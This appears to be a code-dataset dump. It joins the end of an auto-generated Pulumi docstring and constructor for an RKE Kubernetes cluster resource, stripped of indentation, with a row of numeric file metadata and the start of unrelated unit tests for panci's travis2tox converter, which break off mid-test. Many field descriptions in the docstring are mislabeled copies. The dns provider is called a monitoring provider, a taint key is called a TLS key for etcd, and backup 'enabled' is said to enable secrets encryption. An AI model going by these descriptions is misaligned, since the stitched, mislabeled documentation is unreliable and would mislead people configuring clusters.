* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **dns** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
* `reverseCidrs` (`pulumi.Input[list]`) - Reverse CIDRs (list)
* `upstreamNameservers` (`pulumi.Input[list]`) - Upstream nameservers (list)
The **etcd_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **inactive_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **ingress** object supports the following:
* `dnsPolicy` (`pulumi.Input[str]`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **monitoring** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **network** object supports the following:
* `calicoNetworkProvider` (`pulumi.Input[dict]`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`pulumi.Input[str]`) - Calico cloud provider (string)
* `canalNetworkProvider` (`pulumi.Input[dict]`) - Canal network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `flannelNetworkProvider` (`pulumi.Input[dict]`) - Flannel network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `mtu` (`pulumi.Input[float]`) - Network provider MTU. Default `0` (int)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `plugin` (`pulumi.Input[str]`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`pulumi.Input[dict]`) - Weave network provider config (list maxitems:1)
* `password` (`pulumi.Input[str]`) - Registry password (string)
The **nodes** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `dockerSocket` (`pulumi.Input[str]`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`pulumi.Input[str]`) - Hostname override for node (string)
* `internalAddress` (`pulumi.Input[str]`) - Internal address that will be used for components communication (string)
* `labels` (`pulumi.Input[dict]`) - Node labels (map)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `roles` (`pulumi.Input[list]`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`pulumi.Input[str]`)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `taints` (`pulumi.Input[list]`) - Node taints (list)
* `effect` (`pulumi.Input[str]`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `value` (`pulumi.Input[str]`) - Taint value (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **private_registries** object supports the following:
* `isDefault` (`pulumi.Input[bool]`) - Set as default registry. Default `false` (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **restore** object supports the following:
* `restore` (`pulumi.Input[bool]`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`pulumi.Input[str]`) - Snapshot name (string)
The **rotate_certificates** object supports the following:
* `caCertificates` (`pulumi.Input[bool]`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`pulumi.Input[list]`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
The **running_system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **services** object supports the following:
* `etcd` (`pulumi.Input[dict]`) - Docker image for etcd (string)
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`pulumi.Input[dict]`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxtiem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`pulumi.Input[dict]`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`pulumi.Input[dict]`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
* `kubeproxy` (`pulumi.Input[dict]`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `scheduler` (`pulumi.Input[dict]`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_etcd_deprecated** object supports the following:
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
The **services_kube_api_deprecated** object supports the following:
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxtiem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
The **services_kube_controller_deprecated** object supports the following:
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
The **services_kube_proxy_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kube_scheduler_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kubelet_deprecated** object supports the following:
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
The **system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **upgrade_strategy** object supports the following:
* `drain` (`pulumi.Input[bool]`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`pulumi.Input[dict]`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`pulumi.Input[bool]`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`pulumi.Input[bool]`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`pulumi.Input[float]`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`pulumi.Input[bool]`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`pulumi.Input[float]`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`pulumi.Input[str]`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`pulumi.Input[str]`) - RKE max unavailable worker nodes. Default: `10%` (string)
The **worker_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["addon_job_timeout"] = addon_job_timeout
__props__["addons"] = addons
__props__["addons_includes"] = addons_includes
__props__["api_server_url"] = api_server_url
__props__["authentication"] = authentication
__props__["authorization"] = authorization
__props__["bastion_host"] = bastion_host
__props__["ca_crt"] = ca_crt
__props__["cert_dir"] = cert_dir
__props__["certificates"] = certificates
__props__["client_cert"] = client_cert
__props__["client_key"] = client_key
__props__["cloud_provider"] = cloud_provider
__props__["cluster_cidr"] = cluster_cidr
__props__["cluster_dns_server"] = cluster_dns_server
__props__["cluster_domain"] = cluster_domain
__props__["cluster_name"] = cluster_name
__props__["cluster_yaml"] = cluster_yaml
__props__["control_plane_hosts"] = control_plane_hosts
__props__["custom_certs"] = custom_certs
__props__["delay_on_creation"] = delay_on_creation
__props__["dind"] = dind
__props__["dind_dns_server"] = dind_dns_server
__props__["dind_storage_driver"] = dind_storage_driver
__props__["disable_port_check"] = disable_port_check
__props__["dns"] = dns
__props__["etcd_hosts"] = etcd_hosts
__props__["ignore_docker_version"] = ignore_docker_version
__props__["inactive_hosts"] = inactive_hosts
__props__["ingress"] = ingress
__props__["internal_kube_config_yaml"] = internal_kube_config_yaml
__props__["kube_admin_user"] = kube_admin_user
__props__["kube_config_yaml"] = kube_config_yaml
__props__["kubernetes_version"] = kubernetes_version
__props__["monitoring"] = monitoring
__props__["network"] = network
__props__["nodes"] = nodes
__props__["nodes_confs"] = nodes_confs
__props__["prefix_path"] = prefix_path
__props__["private_registries"] = private_registries
__props__["restore"] = restore
__props__["rke_cluster_yaml"] = rke_cluster_yaml
__props__["rke_state"] = rke_state
__props__["rotate_certificates"] = rotate_certificates
__props__["running_system_images"] = running_system_images
__props__["services"] = services
__props__["services_etcd_deprecated"] = services_etcd_deprecated
__props__["services_kube_api_deprecated"] = services_kube_api_deprecated
__props__["services_kube_controller_deprecated"] = services_kube_controller_deprecated
__props__["services_kube_proxy_deprecated"] = services_kube_proxy_deprecated
__props__["services_kube_scheduler_deprecated"] = services_kube_scheduler_deprecated
__props__["services_kubelet_deprecated"] = services_kubelet_deprecated
__props__["ssh_agent_auth"] = ssh_agent_auth
__props__["ssh_cert_path"] = ssh_cert_path
__props__["ssh_key_path"] = ssh_key_path
__props__["system_images"] = system_images
__props__["update_only"] = update_only
__props__["upgrade_strategy"] = upgrade_strategy
__props__["worker_hosts"] = worker_hosts
return Cluster(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 69.085631
| 1,319
| 0.628166
| 18,043
| 165,391
| 5.673391
| 0.037078
| 0.120139
| 0.088898
| 0.03172
| 0.958394
| 0.950296
| 0.939472
| 0.927524
| 0.912656
| 0.901421
| 0
| 0.005274
| 0.22503
| 165,391
| 2,393
| 1,320
| 69.114501
| 0.793373
| 0.60019
| 0
| 0.009302
| 1
| 0
| 0.153528
| 0.039415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018605
| false
| 0.004651
| 0.027907
| 0.009302
| 0.339535
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6d2a10154203c862f145df82e6a1e0fbc346c464
| 1,655
|
py
|
Python
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 34
|
2015-01-04T12:22:35.000Z
|
2020-10-21T22:51:30.000Z
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 11
|
2015-07-18T01:44:11.000Z
|
2019-08-14T05:32:24.000Z
|
panci/tests/test_travis2tox.py
|
msabramo/python-panci
|
f5954f9649ed5ee2a026576d3a74ffa1d3155708
|
[
"MIT"
] | 12
|
2015-02-26T08:55:51.000Z
|
2021-02-14T17:04:48.000Z
|
import six
import unittest
from panci.travis2tox import travis2tox
class TravisToToxCommandsTests(unittest.TestCase):
def test_before_install(self):
travis = '''
language: python
python:
- 2.7
before_install:
- echo 1
- echo 2
'''
tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
def test_install(self):
travis = '''
language: python
python:
- 2.7
install:
- echo 1
- echo 2
'''
tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
def test_after_install(self):
travis = '''
language: python
python:
- 2.7
after_install:
- echo 1
- echo 2
'''
tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
def test_before_script(self):
travis = '''
language: python
python:
- 2.7
before_script:
- echo 1
- echo 2
'''
tox_config = travis2tox(six.StringIO(travis))
self.assertEqual(tox_config.commands, ['echo 1', 'echo 2'])
def test_script(self):
travis = '''
language: python
python:
- 2.7
script:
- echo 1
- echo 2
'''
